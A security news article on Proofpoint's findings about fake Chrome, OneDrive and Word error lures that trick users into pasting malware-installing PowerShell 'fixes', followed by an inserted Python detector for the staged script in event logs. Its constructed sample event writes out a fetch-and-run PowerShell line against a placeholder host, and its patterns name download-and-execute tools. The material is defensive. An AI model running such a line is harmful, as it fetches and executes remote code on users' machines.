Internet-connected devices are never free of risk, and a new entrant can swiftly trick many users into unknowingly installing malware on their devices.
A novel malware distribution campaign uses fake Google Chrome, OneDrive, and Microsoft Word error messages to trick people into "troubleshooting" with PowerShell fixes that actually install malware.
Attackers deliver these lures through JavaScript on compromised websites and through email attachments. The fake error messages, styled to resemble OneDrive, Microsoft Word, or Google Chrome alerts, urge users to click a button that copies a "fix script" to the clipboard. Users are then instructed to paste the copied script into the Windows "Run" dialog or a PowerShell prompt.
What makes this attack effective is the sophistication of the lure. Unlike many attacks, the user is not compromised by a single careless click. Instead, the user is walked through a series of steps to "fix" an error on their device. The multi-step process appears so genuine that users trust it and follow it through, believing they are solving a real problem, only to discover later that they have infected themselves. The whole flow is designed to get users to act without weighing the risks, according to a Proofpoint report.
Among the malicious software Proofpoint identified were DarkGate, NetSupport, XMRig, Amadey Loader, Lumma Stealer, Matanbuchus, and a clipboard hijacker.
The attacking methods
Three distinct attack methods have been identified, each starting in a different manner.
In the first method, the user visits a compromised website. This method is attributed to the threat actors behind ClearFake. The site loads a malicious script hosted on the blockchain through Binance's Smart Chain contracts.
That script scans for vulnerabilities, and the user is then shown a fake Google Chrome alert stating that there is a problem displaying the page. The alert prompts the user to install a "root certificate". To do so, the user is told to copy a PowerShell script to the Windows clipboard and run it in the Windows PowerShell (Admin) console.
Once run, the PowerShell script checks whether the device is a suitable target and then installs the harmful software.
The steps it follows are:
1) Clearing the DNS cache.
2) Clearing the clipboard.
3) Displaying a fake message as a distraction.
4) Downloading another PowerShell script from a remote server. That second script checks whether it is running on a VM (virtual machine) before installing the data-stealing software.
This is how the first attack unfolds.
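The staged script described above (flush DNS cache, clear clipboard, show a distraction message, fetch and run a second script, check for a VM) leaves a recognisable shape in PowerShell script-block logs. The following is an added detection example, not code from the article or from Proofpoint: it scores constructed Windows event 4104 script-block records against those stages and flags blocks that fetch remote code and exhibit several stages at once. The regexes are assumptions about how such stages commonly appear, not indicators quoted from the report.

```python
import re

# Patterns for each stage of the pasted PowerShell chain described above.
# These are assumptions about how such stages commonly look in script-block
# text (Windows event 4104), not indicators quoted from the Proofpoint report.
DOWNLOAD = re.compile(r"Invoke-WebRequest|\biwr\b|\birm\b|Invoke-RestMethod|DownloadString|DownloadFile|Net\.WebClient", re.I)
EXECUTE = re.compile(r"\bIEX\b|Invoke-Expression|Start-Process|\bmsiexec\b", re.I)
STAGES = {
    "flush_dns": re.compile(r"Clear-DnsClientCache|ipconfig\s+/flushdns", re.I),
    "clear_clipboard": re.compile(r"Set-Clipboard\s+(-Value\s+)?(''|\"\")|echo\s+off\s*\|\s*clip\b", re.I),
    "fake_message": re.compile(r"MessageBox\]::Show|\bmsgbox\b|Write-Host\s+['\"][^'\"]*(fix|repair|certificate)", re.I),
    "vm_check": re.compile(r"Win32_ComputerSystem|Win32_BIOS|VMware|VirtualBox|Hyper-V|QEMU", re.I),
}

def score_script_block(text):
    """Map each chain stage to whether it appears in one script-block text."""
    hits = {name: bool(rx.search(text)) for name, rx in STAGES.items()}
    # the fetch-and-run stage is what actually delivers the second script
    hits["remote_stage"] = bool(DOWNLOAD.search(text) and EXECUTE.search(text))
    return hits

def is_clickfix_like(text, min_stages=3):
    """Flag a block that fetches remote code and shows >= min_stages chain stages."""
    hits = score_script_block(text)
    return hits["remote_stage"] and sum(hits.values()) >= min_stages

def triage(events):
    """Return ids of 4104 script-block events that look like the chain."""
    return [ev["id"] for ev in events
            if ev["event_id"] == 4104 and is_clickfix_like(ev["script"])]

# Constructed sample events (not real captured payloads): a routine admin
# one-liner, a block shaped like the chain the article describes, and a
# process-creation event that is not a script block at all.
SAMPLE_EVENTS = [
    {"id": 1, "event_id": 4104, "script": "Clear-DnsClientCache; Resolve-DnsName example.com"},
    {"id": 2, "event_id": 4104, "script": (
        "Clear-DnsClientCache; Set-Clipboard -Value ''; "
        "Write-Host 'Installing root certificate, please wait...'; "
        "if ((Get-CimInstance Win32_ComputerSystem).Model -notmatch 'VMware|VirtualBox') { "
        "IEX (Invoke-WebRequest -UseBasicParsing 'https://STAGE2-PLACEHOLDER.example/s.ps1').Content }")},
    {"id": 3, "event_id": 4688, "script": "IEX (iwr https://example.com/x)"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))  # [2]
```

A single matched stage (event 1 flushes the DNS cache, which admins do routinely) is not enough on its own; the combination with a remote fetch-and-execute is what separates the lure from ordinary administration.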
The second attack is known as the "ClickFix" campaign. It works by injecting code into compromised sites, which then display fake Google Chrome error alerts. Alerts like these, overlaying the page, are enough to worry any user. To fix the supposed errors, users are guided to open "Windows PowerShell (Admin)" and paste a given block of code, which infects the device.
The third method could trap almost anyone. It uses email attachments that look like Microsoft Word documents. Users are urged to download a "Word Online" extension to view the documents properly, and are then offered prompts such as "Auto fix" or "How to fix". The "Auto-fix" option uses a protocol that opens a remote file controlled by the attackers, which can download and run harmful files such as VBS scripts or MSI installers; these in turn infect the device with malware such as DarkGate or Matanbuchus. The "How to fix" option urges the user to copy a PowerShell command and paste it into PowerShell.
Whatever the method, the attackers' aim is malicious: they see users' lack of knowledge as an opportunity to exploit them.